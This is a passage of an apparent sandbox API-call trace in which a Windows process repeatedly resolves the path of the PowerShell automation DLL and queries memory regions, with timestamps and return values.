lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.184] GetLastError () returned 0x0 [0152.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ddd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.184] GetLastError () returned 0x0 [0152.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ddd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.184] GetLastError () returned 0x0 [0152.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.184] GetLastError () returned 0x0 [0152.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.184] GetLastError () returned 0x0 [0152.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.184] GetLastError () returned 0x0 [0152.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.184] GetLastError () returned 0x0 [0152.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.184] GetLastError () returned 0x0 [0152.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.184] GetLastError () returned 0x0 [0152.184] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.184] GetLastError () returned 0x0 [0152.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.185] GetLastError () returned 0x0 [0152.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.185] GetLastError () returned 0x0 [0152.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.185] GetLastError () returned 0x0 [0152.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.185] GetLastError () returned 0x0 [0152.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.185] GetLastError () returned 0x0 [0152.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.185] GetLastError () returned 0x0 [0152.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ded0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.185] GetLastError () returned 0x0 [0152.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ded0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.185] GetLastError () returned 0x0 [0152.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12de80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.185] GetLastError () returned 0x0 [0152.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12de30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.185] GetLastError () returned 0x0 [0152.185] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12de30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.185] GetLastError () returned 0x0 [0152.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.186] GetLastError () returned 0x0 [0152.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.186] GetLastError () returned 0x0 [0152.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.186] GetLastError () returned 0x0 [0152.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.186] GetLastError () returned 0x0 [0152.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ded0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.186] GetLastError () returned 0x0 [0152.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ded0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.186] GetLastError () returned 0x0 [0152.186] VirtualQuery (in: lpAddress=0x12d3d0, lpBuffer=0x12e3d0, dwLength=0x1c | out: lpBuffer=0x12e3d0*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.186] GetLastError () returned 0x0 [0152.186] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ded0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.186] GetLastError () returned 0x0 [0152.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ded0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.187] GetLastError () returned 0x0 [0152.187] VirtualQuery (in: lpAddress=0x12d3d0, lpBuffer=0x12e3d0, dwLength=0x1c | out: lpBuffer=0x12e3d0*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.187] GetLastError () returned 0x0 [0152.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ded0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.187] GetLastError () returned 0x0 [0152.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ded0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.187] GetLastError () returned 0x0 [0152.187] VirtualQuery (in: lpAddress=0x12d3d0, lpBuffer=0x12e3d0, dwLength=0x1c | out: lpBuffer=0x12e3d0*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.187] VirtualQuery (in: lpAddress=0x12d368, lpBuffer=0x12e368, dwLength=0x1c | out: lpBuffer=0x12e368*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.188] VirtualQuery (in: lpAddress=0x12d3a4, lpBuffer=0x12e3a4, dwLength=0x1c | out: lpBuffer=0x12e3a4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.189] VirtualQuery (in: lpAddress=0x12d368, lpBuffer=0x12e368, dwLength=0x1c | out: lpBuffer=0x12e368*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.189] VirtualQuery (in: lpAddress=0x12d3a4, lpBuffer=0x12e3a4, dwLength=0x1c | out: lpBuffer=0x12e3a4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.189] VirtualQuery (in: lpAddress=0x12d3a4, lpBuffer=0x12e3a4, dwLength=0x1c | out: lpBuffer=0x12e3a4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.189] VirtualQuery (in: lpAddress=0x12d368, lpBuffer=0x12e368, dwLength=0x1c | out: lpBuffer=0x12e368*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.189] VirtualQuery (in: lpAddress=0x12d3a4, lpBuffer=0x12e3a4, dwLength=0x1c | out: lpBuffer=0x12e3a4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.189] VirtualQuery (in: lpAddress=0x12d368, lpBuffer=0x12e368, dwLength=0x1c | out: lpBuffer=0x12e368*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.190] VirtualQuery (in: lpAddress=0x12d3a4, lpBuffer=0x12e3a4, dwLength=0x1c | out: lpBuffer=0x12e3a4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.190] VirtualQuery (in: lpAddress=0x12d368, lpBuffer=0x12e368, dwLength=0x1c | out: lpBuffer=0x12e368*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.190] VirtualQuery (in: lpAddress=0x12d3a4, lpBuffer=0x12e3a4, dwLength=0x1c | out: lpBuffer=0x12e3a4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.190] VirtualQuery (in: lpAddress=0x12d20c, lpBuffer=0x12e20c, dwLength=0x1c | out: lpBuffer=0x12e20c*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.190] VirtualQuery (in: lpAddress=0x12d368, lpBuffer=0x12e368, dwLength=0x1c | out: lpBuffer=0x12e368*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.191] VirtualQuery (in: lpAddress=0x12d3a4, lpBuffer=0x12e3a4, dwLength=0x1c | out: lpBuffer=0x12e3a4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.191] VirtualQuery (in: lpAddress=0x12d368, lpBuffer=0x12e368, dwLength=0x1c | out: lpBuffer=0x12e368*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.191] VirtualQuery (in: lpAddress=0x12d3a4, lpBuffer=0x12e3a4, dwLength=0x1c | out: lpBuffer=0x12e3a4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0152.192] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0x9b031d47, Data2=0xdad3, Data3=0x4060, Data4=([0]=0x8c, [1]=0xb0, [2]=0x88, [3]=0x6a, [4]=0x81, [5]=0xf1, [6]=0x75, [7]=0x4d))) returned 0x0 [0152.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12de28, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.192] GetLastError () returned 0x0 [0152.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ddd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.192] GetLastError () returned 0x0 [0152.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ddd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.192] GetLastError () returned 0x0 [0152.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12de28, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.192] GetLastError () returned 0x0 [0152.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ddd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.192] GetLastError () returned 0x0 [0152.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ddd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.192] GetLastError () returned 0x0 [0152.192] CoCreateGuid (in: pguid=0x12e718 | out: pguid=0x12e718*(Data1=0xc1bb63f2, Data2=0x9a3b, Data3=0x4c63, Data4=([0]=0x98, [1]=0xd1, [2]=0x17, [3]=0xbd, [4]=0x70, [5]=0x8a, [6]=0xf3, [7]=0x82))) returned 0x0 [0152.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12de28, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.192] GetLastError () returned 0x0 [0152.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ddd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.193] GetLastError () returned 0x0 [0152.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ddd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.193] GetLastError () returned 0x0 [0152.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12de28, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.193] GetLastError () returned 0x0 [0152.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ddd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.193] GetLastError () returned 0x0 [0152.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12ddd8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.193] GetLastError () returned 0x0 [0152.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.193] GetLastError () returned 0x0 [0152.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.193] GetLastError () returned 0x0 [0152.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12df70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.193] GetLastError () returned 0x0 [0152.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.193] GetLastError () returned 0x0 [0152.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0152.193] GetLastError () returned 0x0 [0152.194] 